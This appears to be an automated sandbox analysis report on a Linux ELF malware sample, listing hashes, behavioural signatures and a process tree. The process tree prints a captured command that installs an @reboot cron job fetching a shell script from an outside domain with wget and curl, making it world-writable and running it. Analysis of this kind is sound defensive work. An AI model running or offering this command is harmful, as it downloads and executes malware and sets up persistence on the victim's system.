Analysis
-
max time kernel
149s -
max time network
139s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
27-10-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Resource
ubuntu2004-amd64-20240611-en
General
-
Target
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
-
Size
73KB
-
MD5
47ee0b8842a526fc0c6ff94fe4ca2ad6
-
SHA1
adf64c9ff9b8d9897fddc7e3014b9c5aea88b964
-
SHA256
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443
-
SHA512
c4ff89dfd2609c7ae0dfa234855be1e0133e8af0bce3afed376135c370eec203ea32c45a1f1d23cbc713717efd36c860478efcfbd85377cd3d17d8051b8f8862
-
SSDEEP
1536:BFEA/tr50yFqIWfWD7LnaItWpOIfFkDFD:BFEAVZRWfWTnaVEIf0FD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elfpid process 1392 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 152.53.15.127 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.1cgCnI crontab -
Changes its process name 1 IoCs
Processes:
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd 1392 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf -
Processes:
721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elfdescription ioc process File opened for reading /proc/861/cmdline 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/270/cmdline 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1458/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1410/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1368/cmdline 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1431/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1/cmdline 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1454/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1455/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1459/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1460/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1463/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1465/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1405/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1422/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1432/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1466/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1457/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1461/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1462/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1464/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1467/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/mounts 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1437/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1456/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf File opened for reading /proc/1468/status 721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
Processes
-
/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:1392 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:1393 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:1395 -
/usr/bin/crontabcrontab -l3⤵PID:1396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD5050970160d674c8e3e883f557c869f9c
SHA19f62fac10caa5e0f6f9642947ef6e7b8e3418dbc
SHA256f93a301e05ee4495bf0a2c767c9a61a4f084c19bc08f618c5a0118533391f203
SHA512584e048471b1d5f554923779f088f10a26d72e6d04200b5cd4049191837de7484b46c578448223888ea5bf054412966bc216818d6fbc03800f39432683f67a10